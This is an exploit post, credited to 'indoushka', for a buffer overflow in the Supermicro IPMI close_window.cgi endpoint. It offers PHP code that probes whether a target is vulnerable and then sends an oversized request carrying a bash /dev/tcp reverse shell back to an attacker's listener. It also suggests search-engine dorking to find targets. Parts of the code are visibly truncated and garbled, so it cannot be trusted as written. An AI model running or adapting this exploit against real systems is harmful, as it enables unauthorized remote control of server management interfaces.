============================================================================================================================================= | # Title : Supermicro Onboard IPMI X9SCL X9SCM with firmware SMT_X9_214 PHP Buffer Overflow | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) | | # Vendor : https://www.supermicro.com | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: This code is an exploit written in PHP, used to test and exploit the Buffer Overflow vulnerability in the Supermicro IPMI interface. If the target is vulnerable to the attack (500 Internal Server Error), a Reverse Shell payload is sent to open a control shell on the target machine. [+] What's going on here? The target-ip and attacker (192.168.1.100:4444) are specified. Checks if the target is vulnerable (checkVulnerability()). If vulnerable, the Reverse Shell payload is sent. [+] Code Summary 1 Sends an initial request to check for vulnerability. 2 If the response is 500, a reverse connection command is sent via User-Agent. 3️ Once the command reaches the victim device, a connection is opened to the attacker. 4️ The attacker can now take full control of the device via nc -lvnp 4444. [+] save code as poc.php. [+] Set Target : line 80 // target ip 81 // Put your IP address 82 // // Set the port you are listening on. [+] USage : php poc.php [+] PayLoad : target_url = rtrim($url, '/'); $this->attacker_ip = $ip; $this->attacker_port = $port; } public function sendCloseWindowRequest($sess, $agent = null) { if (!$agent) { $agent = $this->randomString(8); } $headers = [ "User-Agent: " . $this->randomString(16) . $agent ]; $data = [ 'sess_sid' => $sess ]; return $this->sendPostRequest("/cgi/close_window.cgi", $data, $headers); } private function sendPostRequest($path, $data, $headers = []) { $url = $this->target_url . $path; $options = [ 'http' => [ 'header' => implode("\r\n", $headers) . "\r\nContent-type: application/x-www-form-urlencoded", 'method' => 'POST', 'content' => http_build_query($data), ] ]; $context = stream_context_create($options); return file_get_contents($url, false, $context); } public function checkVulnerability() { $safe_check = $this->randomString(20); $trigger_check = $this->randomString(132); $res = $this->sendCloseWindowRequest($safe_check); if (!$res || strpos($res, "Can't find action") === false) { return "Unknown"; } $res = $this->sendCloseWindowRequest($trigger_check); if (!$res || strpos($res, "500") === false) { return "Safe"; } return "Vulnerable"; } private function randomString($length) { return substr(str_shuffle(str_repeat($x='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil($length/strlen($x)))), 1, $length); } public function exploit() { echo "Target is vulnerable! Sending reverse shell...\n"; $buffer = $this->generatePayload(); $this->sendCloseWindowRequest($buffer); } private function generatePayload() { $payload = "bash -i >& /dev/tcp/{$this->attacker_ip}/{$this->attacker_port} 0>&1"; return str_repeat("A", 8000 - strlen($payload)) . $payload; } } $target_ip = "http://target-ip"; $attacker_ip = "192.168.1.100"; $attacker_port = "4444"; $exploit = new SupermicroExploit($target_ip, $attacker_ip, $attacker_port); $status = $exploit->checkVulnerability(); echo "Target is: $status\n"; if ($status === "Vulnerable") { $exploit->exploit(); } Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================